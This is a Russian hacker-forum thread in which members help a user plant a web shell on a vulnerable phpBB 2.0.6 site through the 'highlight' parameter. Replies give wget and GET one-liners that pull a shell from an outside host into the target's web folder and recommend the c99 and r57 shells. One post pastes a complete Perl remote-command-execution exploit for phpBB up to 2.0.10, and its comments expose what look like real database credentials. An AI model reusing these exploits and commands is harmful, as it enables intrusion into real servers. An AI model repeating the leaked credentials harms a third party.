Форумы Заливка шелла на phpBB 2.0.6 через highlights

Discussion in 'Уязвимости CMS/форумов' started by ded2006, 6 Jan 2006.

  1. ded2006

    ded2006 New Member

    Joined:
    31 Dec 2005
    Messages:
    5
    Likes Received:
    1
    Reputations:
    1
    Здравствуйте житили античата,я квам пришол с такой проблемой...прошу мою проблему не отвергать а ответить на нее...
    Есть форум phpBB 2.0.6 уязвим но как тока я хочю залить на него шелл вот такой команндой:
    &highlight=%2527.$poster=`$cmd`.%2527&cmd=wget xxxx.x.xx/remview.php -P home/www/forum/
    то оно сначала грузит грузит а потом резко остонавлеваеться и неможет загрузить,я думал что оно шелл залило хахожу по ссылки www.site.ru/forum/remview.php а сайт говорит что такого файла нету,значит выходит с этого что шелл НЕ ЗАЛИЛСЯ !!!
    и еще когда пробую GET заливать тоже самое..
    Ответте мне на токую проблему пожалуста....:)
    как можно прито-ком залить шелл ???
     
    1 person likes this.
  2. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Ну...вы, батенька, напишите адресок форума, а мы (я точно) постараемся вам в этом "нелёгком" деле помочь. Пиши хотя бы в асю, если тут боязно.


    Кстати, кто сказал, что там WGET работает???
     
    #2 DRON-ANARCHY, 6 Jan 2006
    Last edited: 6 Jan 2006
  3. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Если wget работает
    wget -o home/www/forum/Nazvanie_Faila.php http://xxxx.x.xx/remview.php

    Плюс попробуй изменить расширение шелла на твоём сайте на txt.
     
    #3 Azazel, 7 Jan 2006
    Last edited: 7 Jan 2006
  4. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    проверь какая качалка стоит на сайте which wget (curl,get,fetch) посмотри какие у тебя права (id) и убедись что папка в которую хочешь залить шелл открыта для записи,проверь правильность пути куда будешь заливать ессли в другую папку.
    и воще remview.php имхо ужанно неудобный шел лучше заюзать c99 или последнюю версию r57.
     
  5. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
  6. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
  7. N1ckeZ

    N1ckeZ New Member

    Joined:
    4 Jan 2006
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    ded2006 епт используй эксплоит все будут работать и к 10 и к 15 и 18 версиям!
    Вот тебе блин все что хочешь ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
    Code:
    #!/usr/bin/perl
    ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## fucking lamaz...
    ##
    ## ccteam.ru
    ## $dbname   = "ccteam_phpbb2";
    ## $dbuser   = "ccteam_userphpbb";
    ## $dbpasswd = "XCbRsoy1";
    ##
    ## eat this dude...
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    if ( @ARGV < 4)
     {
     print q(############################################################
         phpBB <=2.0.10 remote command execution exploit
            by RusH security team // www.rst.void.ru
    ############################################################
     usage:
     r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
     params:
      [URL] - server url e.g. www.phpbb.com
      [DIR] - directory where phpBB installed e.g. /phpBB/ or /
      [NUM] - number of existing topic
      [CMD] - command for execute e.g. ls or "ls -la" 
    ############################################################
     );   
     exit;
     }
    
    $serv  = $ARGV[0];
    $dir   = $ARGV[1];
    $topic = $ARGV[2];
    $cmd   = $ARGV[3];
    
    $serv =~ s/(http:\/\/)//eg;
    print "*** CMD: [ $cmd ]\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    
    $cmd=~ s/(.*);$/$1/eg;
    $cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    
    $path  = $dir;
    $path .= 'viewtopic.php?t=';
    $path .= $topic;
    $path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
    $path .= $cmd;
    $path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
    $path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%
    5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
    
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] 
    CONNECT FAILED\r\n";
    
    print $socket "GET $path HTTP/1.1\n";
    print $socket "Host: $serv\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";
    
    $on = 0;
    
    while ($answer = <$socket>)
    {
    if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
    if ($on == 1) { print "  $answer"; }
    if ($answer =~ /^_START_/) { $on = 1; }
    }
    
    print "[-] EXPLOIT FAILED\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    
    ### EOF ###
    Качай Активе перд и пользуйся. Не ломай бошку всякими загрузками шелла
     
    #7 N1ckeZ, 7 Jan 2006
    Last edited: 7 Jan 2006
  8. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Заливай так GET http://твой_сервер/шелл.php>shell.php;ls -al
     
  9. Dark Angel

    Dark Angel Elder - Старейшина

    Joined:
    23 Nov 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
  10. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Сначала читай посты, прежде чем писать.
    Сплойт работает ДО 10 ВЕРСИИ ВКЛЮЧИТЕЛЬНО. причем этот сплойт там не работает.
    Есть более хорошая статья, но не всем доступна...
     
  11. Dark Angel

    Dark Angel Elder - Старейшина

    Joined:
    23 Nov 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    dron-anarchy ты про чо???
    а ешё один вопрос сплоит рабочий или его нухно дароботать тоесть исправеть
     
    #11 Dark Angel, 8 Jan 2006
    Last edited: 8 Jan 2006
  12. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Дык..вроде рабочий. а ты не пытался его запустиить?=))))
     
  13. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    Бу

    вот ребята а что вы будете делать если на php safe mode, и нельзя команды выполнять? вот чтоб подобных траблов не было, проще сразу проинклудить вебшел. Так как видно что бага представляет собой php injection, делаем типа так:
     
  14. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Если поднятся выше,то баг-mysql-inj а уже с помощью mysql-inj получает выполнение пхп скриптов +)
     
  15. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    mysql-inj это как? если не ошибаюсь то баг там в хреновом использовании preg_replace() ++)
     
  16. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    а я ниче непонял=))) qBiN да если у него и так команды выполняются то нах скуль ему тем более как mysql позволит выполнить пхп команды??=)) и во-вторых бага там в хреновом использовании eval() =)))
     
  17. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    вот сейчас специально для вас двоих- zaco и qbin, потрудился нашел старую версию phpbb , и вот представляю вам на обозрение тот самый уязвимый код из файла viewtopic.php:

    PHP:
    $highlight_match $highlight '';
    if (isset(
    $HTTP_GET_VARS['highlight']))
    {
        
    // Split words and phrases
        
    $words explode(' 'trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

        for(
    $i 0$i sizeof($words); $i++)
        {
            if (
    trim($words[$i]) != '')
            {
                
    $highlight_match .= (($highlight_match != '') ? '|' '') . str_replace('*''\w*'$words[$i]);
            }
        }
        unset(
    $words);

        
    $highlight urlencode($HTTP_GET_VARS['highlight']);
    }

    PHP:
    if ($highlight_match)
        {
            
    // This was shamelessly 'borrowed' from volker at multiartstudio dot de
            // via php.net's annotated manual
            
    $message str_replace('\"''"'substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se'"preg_replace('#\b(" $highlight_match ")\b#i', '<span style=\"color:#" $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')"'>' $message '<'), 1, -1));
        }

    теперьто вы мне поверите?
     
    #17 ShAnKaR, 11 Jan 2006
    Last edited: 11 Jan 2006
  18. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    нене ты думаешь как код выполняется? прег репласе - первая ошибка... а там уже в eval выполняется, ну эт конечно правильно если бы регулярные выражения грамматно настроили то все было бы безопасно+)))... просто имхо eval вообще опасная штука=)
     
  19. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    я не думаю , я знаю- preg_replace с модификатором e
     
  20. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Просто я подумал о том что используется двойное кодирование апострофа-%2527 :)